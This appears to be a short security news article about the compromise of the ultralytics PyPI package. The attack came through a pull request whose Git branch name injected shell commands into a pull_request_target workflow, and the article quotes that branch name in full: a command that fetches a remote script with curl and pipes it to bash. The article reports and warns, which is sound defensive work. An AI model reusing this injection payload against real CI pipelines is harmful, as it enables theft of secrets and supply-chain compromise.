Abusing Git branch names to compromise a PyPI package

A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script.
The GitHub account

'OpenIM Robot'
(which appears to be controlled by
Xinwei Xiong) opened
a pull request for the

ultralytics
Python package. The pull request included a suspicious Git branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Unfortunately, ultralytics uses the
pull_request_target GitHub Action trigger to automate some of its continuous-integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already removed the malicious script.

This problem has been
known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.